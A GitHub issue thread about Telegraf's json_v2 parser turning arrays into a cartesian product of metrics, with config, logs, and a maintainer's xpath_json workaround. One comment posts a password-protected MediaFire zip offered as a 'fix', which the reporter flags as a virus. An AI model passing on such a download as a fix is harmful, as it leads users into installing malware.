### ISSUE TITLE
json_v2 and arrays: unreasonably high number of metrics because of combination of array values

### ISSUE THREAD

**Issue by JSchy65** [influxdata/telegraf#15773]
### Relevant telegraf.conf

```toml
[agent]
  interval = "5s"
  metric_batch_size = 1000
  metric_buffer_limit = 10000
  collection_jitter = "0s"
  flush_interval = "1s"
  flush_jitter = "0s"
  precision = ""
  hostname = ""
  omit_hostname = false
  debug = true

[[outputs.file]]
  files = ["stdout", "/tmp/telegraf/metrics.out"]
  data_format = "influx"

[[inputs.file]]
  files = ["/home/joachim/telegraf/metrics.json"]
  character_encoding = "utf-8"
  name_override = "v"
  data_format = "json_v2"

[[inputs.file.json_v2]]

  [[inputs.file.json_v2.object]]
    path = "v"
```

### Logs from Telegraf

```text
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Loading config: /etc/telegraf/telegraf.conf
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Starting Telegraf 1.31.3 brought to you by InfluxData the makers of InfluxDB
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Available plugins: 234 inputs, 9 aggregators, 32 processors, 26 parsers, 60 outputs, 6 secret-stores
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Loaded inputs: file
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Loaded aggregators:
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Loaded processors:
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Loaded secretstores:
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Loaded outputs: file
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! Tags enabled: host=clientA
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z I! [agent] Config: Interval:5s, Quiet:false, Hostname:"clientA", Flush Interval:1s
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z D! [agent] Initializing plugins
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z D! [agent] Connecting outputs
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z D! [agent] Attempting connection to [outputs.file]
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z D! [agent] Successfully connected to outputs.file
Aug 26 15:17:59 clientA telegraf[28927]: 2024-08-26T13:17:59Z D! [agent] Starting service inputs
Aug 26 15:17:59 clientA systemd[1]: Started Telegraf.
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="7",c="4",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="7",c="4",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="7",c="5",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="7",c="5",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="7",c="6",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="7",c="6",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="8",c="4",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="8",c="4",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="8",c="5",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="8",c="5",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="8",c="6",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="8",c="6",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="9",c="4",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="9",c="4",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="9",c="5",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="9",c="5",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="9",c="6",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="9",c="6",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="A",c="4",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="A",c="4",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="A",c="5",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="A",c="5",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="A",c="6",b="2" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: v,host=clientA a="1",d="A",c="6",b="3" 1724678280000000000
Aug 26 15:18:00 clientA telegraf[28927]: 2024-08-26T13:18:00Z D! [outputs.file]  Wrote batch of 24 metrics in 583.296µs
Aug 26 15:18:00 clientA telegraf[28927]: 2024-08-26T13:18:00Z D! [outputs.file]  Buffer fullness: 0 / 10000 metrics
Aug 26 15:18:01 clientA telegraf[28927]: 2024-08-26T13:18:01Z D! [outputs.file]  Buffer fullness: 0 / 10000 metrics
Aug 26 15:18:02 clientA telegraf[28927]: 2024-08-26T13:18:02Z D! [outputs.file]  Buffer fullness: 0 / 10000 metrics
Aug 26 15:18:03 clientA systemd[1]: Stopping Telegraf...
```

### System info

Telegraf 1.31.3 on Ubuntu 22.04.4 LTS

### Steps to reproduce

Json Input File:

{
  "v": {
         "a": "1",
         "b": ["**2**", "**3**"],
         "c": ["**4**", "**5**", "**6**"],
	  "d": ["**7**", "**8**", "**9**", "**A**"]
       }
}

### Expected behavior

What is the idea behind that implementation in json_v2 ?
What is a use case for combining the fields data in that way ?

I expected something like the output of json (without v2). One metric and the array values have an index attached to the name:

{"fields":{"a":"1","**b_0**":"**2**","**b_1**":"**3**","**c_0**":"**4**","**c_1**":"**5**","**c_2**":"**6**","**d_0**":"**7**","**d_1**":"**8**","**d_2**":"**9**","**d_3**":"**A**"},"name":"v","tags":{"host":"clientA"},"timestamp":1724678840}

### Actual behavior

json_v2 returns 24 metrics (2 x 3 x 4), one metric for each possible combination of the arrays values:

v,host=clientA a="1",d="**7**",c="**4**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**7**",c="**4**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**7**",c="**5**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**7**",c="**5**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**7**",c="**6**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**7**",c="**6**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**8**",c="**4**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**8**",c="**4**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**8**",c="**5**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**8**",c="**5**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**8**",c="**6**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**8**",c="**6**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**9**",c="**4**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**9**",c="**4**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**9**",c="**5**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**9**",c="**5**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**9**",c="**6**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**9**",c="**6**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**A**",c="**4**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**A**",c="**4**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**A**",c="**5**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**A**",c="**5**",b="**3**" 1724676745000000000
v,host=clientA a="1",d="**A**",c="**6**",b="**2**" 1724676745000000000
v,host=clientA a="1",d="**A**",c="**6**",b="**3**" 1724676745000000000

### Additional info

Probably related to:
https://github.com/influxdata/telegraf/issues/14184

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JSchy65** [comment]
To every one: DON´T FOLLOW THE ABOVE LINK OR OPEN THE FILE - IT CONTAINS A VIRUS !!!

**Comment by srebhan** [comment]
@JSchy65 using `json_v2` with arrays is hard and might even be impossible. I recommend using the [xpath parser](https://github.com/influxdata/telegraf/tree/master/plugins/parsers/xpath) instead. The following config
```toml
[[inputs.file]]
  files = ["/home/joachim/telegraf/metrics.json"]
  character_encoding = "utf-8"

  data_format = "xpath_json"
  xpath_native_types = true

  [[inputs.file.xpath]]
    metric_name = "name(.)"
    metric_selection = "*"
    field_selection = "descendant::*[not(*)]"
```
will result in
```
v,host=Hugin a="1",b_0="2",b_1="3",c_0="4",c_1="5",c_2="6",d_0="7",d_1="8",d_2="9",d_3="A" 1724925060000000000
```
with your example
